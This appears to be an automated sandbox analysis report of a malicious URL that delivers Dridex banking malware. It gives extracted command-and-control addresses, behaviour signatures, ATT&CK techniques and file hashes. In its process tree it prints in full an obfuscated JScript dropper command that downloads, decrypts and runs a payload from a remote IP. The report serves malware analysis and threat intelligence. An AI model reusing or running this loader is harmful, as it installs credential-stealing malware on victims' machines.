Overview

overview

10

Static

static

URLScan

urlscan

https://ankltraffice...

windows7_x64

6

https://ankltraffice...

windows7_x64

1

https://ankltraffice...

windows7_x64

1

https://ankltraffice...

windows7_x64

1

https://ankltraffice...

windows10_x64

10

https://ankltraffice...

windows10_x64

10

https://ankltraffice...

windows10_x64

10

https://ankltraffice...

windows10_x64

10

https://ankltraffice...

windows10_x64

Analysis

  • max time kernel
    131s
  • max time network
    154s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    10-09-2021 00:52

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    https://ankltrafficexit.xyz/trafficexit

  • Sample

    210910-a7538ahad4

Score
10/10
dridex10111botnetdiscoveryevasiontrojan

Malware Config

Extracted

Family

dridex

Botnet

10111

C2

104.152.111.198:9676

92.247.29.75:10172

133.242.136.130:8194
rc4.plain
rc4.plain

Signatures

  • Dridex

    Dridex(known as Bugat/Cridex) is a form of malware that specializes in stealing bank credentials.

    botnetdridex
  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
    evasiontrojan
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 40 IoCs
    adwarespyware
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" https://ankltrafficexit.xyz/trafficexit
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:664
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:664 CREDAT:82945 /prefetch:2
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:3948
      • C:\Windows\SysWOW64\cmd.exe
        cmd.exe /q /c cd /d "%tmp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y["set"+"Proxy"](n);y.open("GET",k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/["Wait"+"ForResponse"]();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e["cha"+"rCodeAt"](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join("")};try{var u=WScript.Echo(),o="Object",A=Math,a=Function("b","return WScript.Create"+o+"(b)");P=(""+WScript).split(" ")[1],M="indexOf",q=a(P+"ing.FileSystem"+o),m=WScript.Arguments,e="WinHTTP",Z="cmd",Q=a("WinH"+"ttp.WinHttpRequest.5.1"),j=a("W"+P+".Shell"),s=a("ADODB.Stream"),x=O(8)+".",p="exe",n=0,K=WScript[P+"FullName"],E="."+p;Y="Type";s[Y]=2;s.Charset="iso-8859-1";s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]("PE\x00\x00"));s.WriteText(v);if(32-1^<d){var z=1;x+="dll"}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x="regsvr"+32+E+" /s "+x);j.run(Z+E+" /c "+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp "hX1ZytEytd" "http://31.44.3.102/?NTk1NzM2&JGsABzK&fhfghddfsdf=twix&dsfdffg43t=TKNbP0fOH0eD2MjN2LHTRcHsLlni0urBDV2rtl7yQ1mH9PoufLZQO1fijE2Fc1AznI0PUF5H8K6si0WBwUXNgp_R-CWPYAh1otKWJA&ogfgafgn4=wH3QMvXcJwDMFYPJKeXD&sdfsdfdfg=why&cxssdvxcv=109hbobs.102fq101.406y2p1j0&IHTvMTk4NjI=" "2""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:712
        • C:\Windows\SysWOW64\wscript.exe
          wsCripT //B //E:JScript 3.tMp "hX1ZytEytd" "http://31.44.3.102/?NTk1NzM2&JGsABzK&fhfghddfsdf=twix&dsfdffg43t=TKNbP0fOH0eD2MjN2LHTRcHsLlni0urBDV2rtl7yQ1mH9PoufLZQO1fijE2Fc1AznI0PUF5H8K6si0WBwUXNgp_R-CWPYAh1otKWJA&ogfgafgn4=wH3QMvXcJwDMFYPJKeXD&sdfsdfdfg=why&cxssdvxcv=109hbobs.102fq101.406y2p1j0&IHTvMTk4NjI=" "2""
          4⤵
          • Blocklisted process makes network request
          • Suspicious use of WriteProcessMemory
          PID:2844
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c xkrzk.exe
            5⤵
              PID:3476
              • C:\Users\Admin\AppData\Local\Temp\xkrzk.exe
                xkrzk.exe
                6⤵
                • Executes dropped EXE
                • Checks whether UAC is enabled
                PID:3940

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Initial Access

    Execution

    Persistence

    Privilege Escalation

    Defense Evasion

    Modify Registry

    1
    T1112

    Credential Access

    Discovery

    Query Registry

    1
    T1012

    System Information Discovery

    2
    T1082

    Lateral Movement

    Collection

    Exfiltration

    Command and Control

    Impact

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
      MD5

      f330f5c2ae65a5afe1a96d38e55ac8fc

      SHA1

      9432e52f3eda1c41fe8812cc010ff8702e2e4b7e

      SHA256

      31503cf9dda5cbac641697611050e3e74fa6db6e6eb6d2e5260d532801423d42

      SHA512

      59a55559cb54384ba57730e326253baf636a067d1c12285496db0b7f2f265feb9ca2ef92ac50611878c1e13acf1320c8016f323132ab1a04fb46c915ca761dbf

      Download Submit
    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
      MD5

      0ee4330b303531893fd7e8759caba6ef

      SHA1

      943fb59aa8214852114cf6f06c195601b2faf0fe

      SHA256

      e1168b49cbe12d54d5b38fe6cd64f7cff690a21e043f7c390bf5ecc9232f5a41

      SHA512

      d7aa1f24d3d41be85ffe77a4e6d4f018ef0a324fa97863428b96a337426bde61a79dc38c98ae657ea1ee9b8f43329d6abd2893ce98763565bef32a2cbf86695b

      Download Submit
    • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\B86Z2F34.cookie
      MD5

      303a209c2556ead5715a4ac47d01c9f7

      SHA1

      1bb6cb12dab0a2862305e9ff2192ce2fd86027f9

      SHA256

      7b328e8336b8faac0303b2d9ec7d00df656f17c49fde9c0b01acdaa7bd78f134

      SHA512

      2a1aacb58dd74138085db474ef28d8e90411c68cf81ef6de8453b184cc57cfd125f418a04a2c846374028cd859964fb51f502faf0a97c774db55abfabe729ed7

      Download Submit
    • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\G0C79W80.cookie
      MD5

      edcf494e59adcd3dbe3635d814ae9f4c

      SHA1

      0df62e7621cb0e6c8a024a8aad40eb84a25d900c

      SHA256

      54e120a864a3152a4239f6fcd9683fea4a9e7d1d17c77d2c86ab60b74e18dcfd

      SHA512

      8ca6758e0c45ba4516decc4a289473c656b0a4006dad3387c165e775c1a30d9a7fb8726a4ed7c88b81b3add9166ff0c3d7d359a3bdd65a508cb5367b35ca14fc

      Download Submit
    • C:\Users\Admin\AppData\Local\Temp\3.tMp
      MD5

      60fc00422b399db85f87d41b8328976d

      SHA1

      bb85034acad8025f97e5bb236443debaf8926e4b

      SHA256

      c38eb3965155b143c8d72bf219ec6dd985a106ce0776c272470b0019e74fb690

      SHA512

      16fa1a3c187500b5c3867fa05752428496273b73c2960c54d2e34e4833a057392c1f5469c8824fdc3d29c9ece2e65189ee281638ccaae941437a259192591151

      Download Submit
    • C:\Users\Admin\AppData\Local\Temp\xkrzk.exe
      MD5

      223dc24b1075564c200030321e21ee09

      SHA1

      76fdfb19ae4f9de19f5c039c16fd519a5f96027f

      SHA256

      9ba5eb35f3869aaba5be3c0dc7bc64ff2de408c3679c13f0b84733da0a78a280

      SHA512

      29f073141709ff88d050282ebffd1d6ad9278068ff78e37537b26e88063664f7d6652abcd15666e3d53d8ef2ef9fb75b59eae0febc1f760a5e73aae3e71c9277

      Download Submit
    • C:\Users\Admin\AppData\Local\Temp\xkrzk.exe
      MD5

      223dc24b1075564c200030321e21ee09

      SHA1

      76fdfb19ae4f9de19f5c039c16fd519a5f96027f

      SHA256

      9ba5eb35f3869aaba5be3c0dc7bc64ff2de408c3679c13f0b84733da0a78a280

      SHA512

      29f073141709ff88d050282ebffd1d6ad9278068ff78e37537b26e88063664f7d6652abcd15666e3d53d8ef2ef9fb75b59eae0febc1f760a5e73aae3e71c9277

      Download Submit
    • memory/664-114-0x00007FFAE0360000-0x00007FFAE03CB000-memory.dmp
      Filesize

      428KB

      Download
    • memory/712-116-0x0000000000000000-mapping.dmp
      Download
    • memory/2844-117-0x0000000000000000-mapping.dmp
      Download
    • memory/3476-119-0x0000000000000000-mapping.dmp
      Download
    • memory/3940-122-0x0000000002280000-0x00000000022BC000-memory.dmp
      Filesize

      240KB

      Download
    • memory/3940-123-0x0000000000400000-0x000000000051A000-memory.dmp
      Filesize

      1.1MB

      Download
    • memory/3948-115-0x0000000000000000-mapping.dmp
      Download